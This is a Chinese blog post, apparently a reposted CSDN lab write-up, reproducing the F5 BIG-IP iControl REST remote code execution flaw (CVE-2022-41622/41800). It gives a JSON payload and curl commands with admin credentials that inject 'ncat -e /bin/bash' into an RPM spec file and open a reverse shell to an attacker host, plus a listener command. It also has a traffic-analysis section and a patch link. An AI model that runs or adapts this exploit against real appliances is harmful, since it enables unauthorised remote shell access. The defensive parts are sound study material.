码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CVE-2022-41622 & CVE-2022-41800 F5 BIG-IP和BIG-IQ远程代码执行漏洞复现


    目录

    0x01 声明:

    0x02 简介:

    0x03 漏洞概述:

    0x04 影响版本:

    0x05 环境搭建:

    下载&安装

    登录web页面:

    0x06 漏洞复现:

    构造JSON Payload:

    发送请求

    查看服务端:

    攻击主机启动监听器:

    使用jq格式化输出:

    监听成功:

    0x07 流量分析:

    特征一:

    客户端:

    URL:

    DATA:

    Shell流量:

    0x08 修复建议:


    0x01 声明:

            仅供学习参考使用,请勿用作违法用途,否则后果自负。

    0x02 简介:

            F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。

    0x03 漏洞概述:

            在设备模式下运行时,分配了管理员角色的经过身份验证的用户可能能够利用未公开的 iControl REST 端点绕过设备模式限制。成功利用此漏洞可使攻击者跨越安全边界,在装置模式下运行时,分配了管理员角色的已验证用户可能能够利用未公开的iControl REST端点绕过装置模式限制。成功利用此漏洞可使攻击者跨越安全边界。

    0x04 影响版本:

    BIG-IP <17.x

    0x05 环境搭建:

    下载&安装

    参考这篇文章: (CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现_Evan Kang的博客-CSDN博客)

    登录web页面:

    0x06 漏洞复现:

    构造JSON Payload:

    1. {
    2.   "specFileData": {
    3.     "name": "test",
    4.     "srcBasePath": "/tmp",
    5.     "version": "test6",
    6.     "release": "test7",
    7.     "description": "test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444",
    8.     "summary": "test9"
    9.   }
    10. }

    发送请求

    curl -sk -u admin:P@ssw0rd -H "Content-Type: application/json" -X POST https://192.168.119.220/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}'

    查看服务端:

    判断请求是否成功

    cat /var/config/rest/node/tmp/*.spec

    攻击主机启动监听器:

    nc -lvp 4444

    使用jq格式化输出:

    Jq安装:

    wget http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm

    rpm -ivh epel-release-latest-7.noarch.rpm

    yum repolist

    yum -y install jq

    curl -X POST -k -u admin:P@ssw0rd https://192.168.119.220/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/af35efa2-483e-4b6c-a6be-0c4bf11e36b7.spec", "force": true }' | jq

    监听成功:

    0x07 流量分析:

    特征一:

    客户端:

    URL:

    /mgmt/shared/iapp/build-package

    DATA:

    1. check\nncat -e /bin/bash 192.168.119.243
    2. specFilePath: xxx.spec

    Shell流量:

    0x08 修复建议:

            如果您运行的是已知易受攻击的版本列中列出的版本,可以通过升级到中引入的修复 列中的值。如果该表仅列出比当前运行的版本旧的版本,或者未列出不易受攻击的版本,则当前不存在升级候选版本。

    https://support.f5.com/csp/article/K13325942

  • 相关阅读:
    LeetCode每日两题01:移动零 (均1200道)方法:双指针
    高德 Android 地图SDK 绘制面不显示
    python+django+mysql个人博客毕业设计毕设开题报告
    Netty 5新Buffer API详解
    Docker基本管理
    linux php-fpm进程 cpu占用过高 解决方法
    剖析 Vue.js 内部运行机制
    关于 Coremail windows邮箱客户端(Air 版)特定附件名称显示不正确问题的说明
    Java中单链表的创建
    OSS存储开放接口规范 和 错误响应
  • 原文地址:https://blog.csdn.net/qq_44281295/article/details/128099642
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号